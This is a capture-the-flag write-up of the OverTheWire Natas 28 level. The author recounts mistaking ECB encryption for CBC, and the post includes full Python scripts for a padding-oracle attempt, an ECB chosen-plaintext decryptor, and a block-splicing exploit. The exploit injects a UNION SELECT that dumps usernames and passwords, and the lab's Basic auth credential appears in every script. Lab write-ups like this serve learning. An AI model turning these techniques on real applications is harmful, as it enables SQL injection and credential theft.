Natas 28: Getting It Wrong

I wanted to show someone a good example of a PHP unserialize vulnerability, and remembered that the natas challenges had contained one. So I decided I would do all the challenges to find the one I was looking for, and because I thought it would be fun and easy. Largely I was right and I cruised right through them, found the unserialize one, and kept going. Until I got stopped dead at Natas 28. The problem was not that it was exceptionally difficult; the problem was my reluctance to question my original assumptions about the challenge. I started the challenge, entered a search query, messed with the resulting redirected url, and was presented with

Incorrect amount of PKCS#7 padding for blocksize

And I immediately thought “This is totally a Padding Oracle Attack“. I was certain of it. I then tested different input strings and examined the resulting ciphertext in the query parameter, and determined the block size was 16 bytes. I now had all the information I needed to create a program to decrypt the ciphertext and reveal the password that I thought would be waiting in it. I used this convenient Padding Oracle API, and was able to quickly create the right program by switching out some lines in the example. I ended up with the following code

from paddingoracle import BadPaddingException, PaddingOracle, xor
from base64 import b64encode, b64decode
from urllib import quote, unquote
import requests
import socket
import time

class PadBuster(PaddingOracle):
    def __init__(self, **kwargs):
        super(PadBuster, self).__init__(**kwargs)
        self.session = requests.Session()
        self.wait = kwargs.get('wait', 2.0)

    def oracle(self, data, **kwargs):
        somequery = quote(b64encode(data))
        #self.session.cookies['somecookie'] = somecookie

        while 1:
            try:
                #print "[*] Trying %s" % somequery
                headers = {"Authorization": "Basic bmF0YXMyODpKV3dSNDM4d2tnVHNOS0JiY0pvb3d5eXNkTTgyWWplRg=="}
                response = self.session.get('http://natas28.natas.labs.overthewire.org/search.php/?query='+somequery,
                        stream=False, timeout=5, verify=False, headers=headers)
                break
            except (socket.error, requests.exceptions.RequestException):
                logging.exception('Retrying request in %.2f seconds...', self.wait)
                time.sleep(self.wait)
                continue

        self.history.append(response)

        if "Incorrect amount of PKCS#7 padding for blocksize" not in response.content:
            logging.debug('No padding exception raised on %r', somequery)
            return

        else:
			raise BadPaddingException

if __name__ == '__main__':
    import logging
    import sys

    if not sys.argv[1:]:
        print 'Usage: %s <somequery value>' % (sys.argv[0], )
        sys.exit(1)

    logging.basicConfig(level=logging.DEBUG)

    encrypted_query = b64decode(unquote(sys.argv[1]))

    padbuster = PadBuster()

    query = padbuster.decrypt(encrypted_query, block_size=16, iv=bytearray(16))

    print('Decrypted somequery: %s => %r' % (sys.argv[1], query))

This is the right code to take the encrypted query parameter and return the decrypted ciphertext if my assumptions were correct. So I ran the program and it resulted in… gibberish. If it even was able to finish, which in general for 16 byte blocks it wasn’t. It would fail to decrypt some bytes. This is where I screwed up by not rethinking my assumptions about this challenge. Instead I assumed there was something wrong with the code. And when I was convinced that what I wrote was right I wondered if maybe the open source code I was relying on was wrong, so I went through it to make sure it was doing the right thing (it was). I read and reread about padding oracle attacks. I wondered if it was actually an 8 byte block cipher and somehow the additional bytes were being doubled.

Eventually I was still so convinced it was a POA that I asked someone online what I was doing wrong. And they told me to take another look at my assumptions about the cipher, particularly the block mode. I realized almost immediately that the block mode was actually ECB. If I hadn’t so blindly believed I was right in the beginning I would have noticed that the test queries and resulting ciphertexts could not possibly be the result of CBC.

Now that I knew it was ECB I decided to use a chosen plaintext attack, which would allow me to decrypt the portion of the ciphertext after the part that corresponded to the bytes of my query. I found another nice framework to carry this out, chosen-plaintext by EiNSeiN. Using this I produced the following code

import requests
from urllib import quote, unquote
from chosen_plaintext import ChosenPlaintext

class Client(ChosenPlaintext):

	def __init__(self):
		ChosenPlaintext.__init__(self)
		#self.block_size = 16
		#self.plaintext_offset = 32
		
		return

	def ciphertext(self, plaintext):

		print "[*] Trying plaintext: %s" % plaintext.encode("hex")
		headers = {"Authorization": "Basic bmF0YXMyODpKV3dSNDM4d2tnVHNOS0JiY0pvb3d5eXNkTTgyWWplRg=="}
		resp = requests.post("http://natas28.natas.labs.overthewire.org/index.php", data={"query": plaintext}, headers=headers)

		data = unquote(resp.url.split("query=")[1]).decode("base64")
		print "[*] Got ciphertext: %s" % unquote(resp.url.split("query=")[1]).decode("base64").encode("hex")
		
		return data

c = Client()
c.run()
print 'recovered', repr(c.plaintext)

But this code also failed after it found a single byte of plaintext: “%”! So again I thought the code must be wrong. However eventually I remembered that some query characters were being escaped which breaks the ability to perform the chosen plaintext attack beyond an occurrence of one of those characters. So now I knew the next two parts of the plaintext were % and an escaped character. After thinking for a little about it I concluded that it was %’ because it was the end of a SQL LIKE clause, something like “… WHERE joke_body LIKE ‘%{escaped_query}%’ …”. This fit the behavior of the script and made sense with those characters. So now I knew that the ciphertext was an ECB Mode Block Cipher encrypted SQL query. Now since ECB simply encrypts each block separately I could encrypt a block containing valid SQL syntax and then insert it after the %’ in the ciphertext in order to achieve SQL injection. The code below accomplishes this and prints out the password.

import requests
from urllib import quote, unquote
import re

from pwn import *

natas_url = "http://natas28.natas.labs.overthewire.org/index.php"
search_url = "http://natas28.natas.labs.overthewire.org/search.php/?query="

#authorization header
headers = {"Authorization": "Basic bmF0YXMyODpKV3dSNDM4d2tnVHNOS0JiY0pvb3d5eXNkTTgyWWplRg=="}

log.info("Retrieving first ciphertext")

#pad plaintext to ensure it takes up a full ciphertext block
plaintext = "A"*10 + "B"*14
resp = requests.post(natas_url, data={"query": plaintext}, headers=headers)

#get the raw bytes of the ciphertext
encoded_ciphertext = resp.url.split("query=")[1]
ciphertext = unquote(encoded_ciphertext).decode("base64")

#sql to inject into ciphertext query
new_sql = " UNION ALL SELECT concat(username,0x3A,password) FROM users #"
log.info("Appending query: %s" % new_sql)

#pad plaintext to ensure it also takes up a whole number of ciphertext blocks
plaintext = "A"*10 + new_sql + "B"*(16-(len(new_sql)%16))
offset = 48 + len(plaintext)-10

resp = requests.post(natas_url, data={"query": plaintext}, headers=headers)
encoded_new_ciphertext = resp.url.split("query=")[1]
new_ciphertext = unquote(encoded_new_ciphertext).decode("base64")
encrypted_sql = new_ciphertext[48:offset]

#add the encrypted new sql into the final ciphertext
final_ciphertext = ciphertext[:64]+encrypted_sql+ciphertext[64:]

resp = requests.get(search_url, params={"query":final_ciphertext.encode("base64")}, headers=headers)

log.info("Response: %s" % re.findall("<li>(.*?)</li>", resp.content)[0])

This was a surprising and interesting challenge. It nicely demonstrates the weakness of ECB block ciphers when the attacker is able to partially control plaintext. It also demonstrated to me that I should never be so sure of my initial assessment that I am blinded when new evidence appears.